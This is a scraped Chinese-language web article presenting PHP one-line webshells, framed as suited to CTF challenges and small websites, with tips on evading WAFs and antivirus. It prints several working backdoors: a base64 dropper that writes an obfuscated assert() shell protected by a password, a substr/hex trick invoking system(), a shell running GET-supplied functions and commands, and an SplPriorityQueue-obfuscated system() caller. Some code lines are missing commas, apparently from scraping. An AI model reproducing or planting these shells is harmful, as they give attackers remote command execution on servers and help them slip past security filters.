快捷搜索:  汽车  科技

木马行业:0X00普通的一句话木马 适用于CTF和小站

木马行业:0X00普通的一句话木马 适用于CTF和小站另外在附上小马一个,希望大家一起集思广益!<?php $file="shell.php"; $shell="PD9waHAKJGEgPSBzdWJzdHJfcmVwbGFjZSgieHhzZXIiLCJhc3NlciIsLTMpOwokYiA9IGFycmF5KCcnLCRhKTsKJGMgPSAkYlsxXS5jaHIoJzExNicpOwokZnVuPXByZWdfcmVwbGFjZSgiL3h4LyIsIiIsJGMpOwokZCA9IHN1YnN0cl9yZXBsYWNlKCIiLCRmdW4sMCk7CiRkICgkX1BPU1RbJzExMCddKTsKPz4="; file_put_contents($file base64_decode($shell)); ?> //连接密码110<?php $a = $_GET['

2、十六进制字符串

PHP版本:只限于5.3和5.5版本;在php7中不认为是数字,php5则依旧为数字。(友情提示: 5.X可以成功执行命令,php7无法执行)

<?php $s=substr("aabbccsystem" "0x6"); $s(whoami) ?>

木马行业:0X00普通的一句话木马 适用于CTF和小站(1)

小提示:对于我们可以结合垃圾数据,变形混淆,以及大量特殊字符和注释的方式来构造更多的payload 毕竟每家的waf规则不同,配置也不同,与一些传输层面的bypass进行结合产生的可能性就会非常多样。

3、利用在语法不换行来执行命令

PHP版本:只限于7.3.4版本,如果是其他的版本就会报错,所以针对性较强!

<?php $a = $_GET['function'] ?? 'whoami'; $b = $_GET['cmd'] ?? 'whoami'; $a(null.(null.$b)); ?>

小提示:7.0版本的??特性,如果版本为5.x的话就会报错,可以结合一些其他的方式吧!

木马行业:0X00普通的一句话木马 适用于CTF和小站(2)

0X04PHP一句话免杀实例

我这边就送个大家一些免杀把!

<?php $file="shell.php"; $shell="PD9waHAKJGEgPSBzdWJzdHJfcmVwbGFjZSgieHhzZXIiLCJhc3NlciIsLTMpOwokYiA9IGFycmF5KCcnLCRhKTsKJGMgPSAkYlsxXS5jaHIoJzExNicpOwokZnVuPXByZWdfcmVwbGFjZSgiL3h4LyIsIiIsJGMpOwokZCA9IHN1YnN0cl9yZXBsYWNlKCIiLCRmdW4sMCk7CiRkICgkX1BPU1RbJzExMCddKTsKPz4="; file_put_contents($file base64_decode($shell)); ?> //连接密码110

木马行业:0X00普通的一句话木马 适用于CTF和小站(3)

另外在附上小马一个,希望大家一起集思广益!

<?php ini_set("display_errors" 1); $objPQ = new SplPriorityQueue(); $objPQ->insert('m' 1); $objPQ->insert('s' 6); $objPQ->insert('e' 3); $objPQ->insert('s' 4); $objPQ->insert('y' 5); $objPQ->insert('t' $_GET[a]); $objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA); //Go to TOP $objPQ->top(); $m=''; $cur = new ErrorException($_GET[b]); while($objPQ->valid()){ $m.=$objPQ->current(); $objPQ->next(); } echo $m($cur->getMessage()); ?> //密钥3

木马行业:0X00普通的一句话木马 适用于CTF和小站(4)

0X04 一句话免杀小结

这篇文章的目的是想让大家对一句话木马免杀有一定的了解,在免杀对抗越来越激烈的情况下,我们不得不发散自己的思维。这次就由我来抛砖引玉,大家有什么想法,可以评论区交流!

猜您喜欢: